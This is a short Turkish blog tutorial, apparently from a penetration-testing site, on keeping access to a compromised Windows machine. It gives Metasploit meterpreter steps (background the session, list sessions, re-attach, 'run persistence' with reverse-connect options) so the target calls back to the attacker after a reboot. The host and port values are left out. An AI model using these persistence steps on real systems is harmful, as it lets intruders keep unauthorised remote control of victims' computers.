Backdoor (Arka Kapı) Yerleştirme -Windows

Herkeze Selamlar,
Bu makalemde ele geçirilmiş bir windows makinaya nasıl backdoor (Arka Kapı) yerleştirilir bundan bahsedeceğim.

İlk olarak aşağıda örnek bir trojan oluşturulmuştur, belirtilen port dinlemeye alınarak hedef sistemden reverse bağlantı alınmıştır.
Şimdi asıl işimize geçelim, meterpreter satırındayken "backround" komutunu kullanarak gelen bağlantıyı arka plana alıyoruz, "sessions" komutu ile "ID" numarasını öğreniyoruz. Şimdi tekrardan "sessions -i " şeklinde bağlantı yapıyoruz. Meterpreter satırındayken ufak bir script çalıştıracagız "run persistence -U i 5 -p -r " şeklinde yazılır ve çalıştırılır.
Evet gerekli aşamalar sıkıntız bir şekilde gerçekleşti. Şimdi test etmek için hedef sistemi shutdown veya restart edelim.
Evet sessions komutu çalıştırdıgımız zaman görüldüğü gibi hiçbir bağlantı yok. Hedef sistem yeniden açıldıktan sonra "run" komutunu kullanarak sisteme tekrardan giriş sağlıyoruz.
Kısacası bir backdoor nasıl yerleştirilir onu anlatmaya çalıştım, yararlı olması dileği ile..

Güvenli Günler

Yorumlar

Bu blogdaki popüler yayınlar

MS17-010 Zafiyetiden Faydalanarak Domain Controller Ele Geçirme

Sızma Testi Senaryosu - Bölüm 1

Windows İşletim Sisteminde Yetki Yükseltme - 1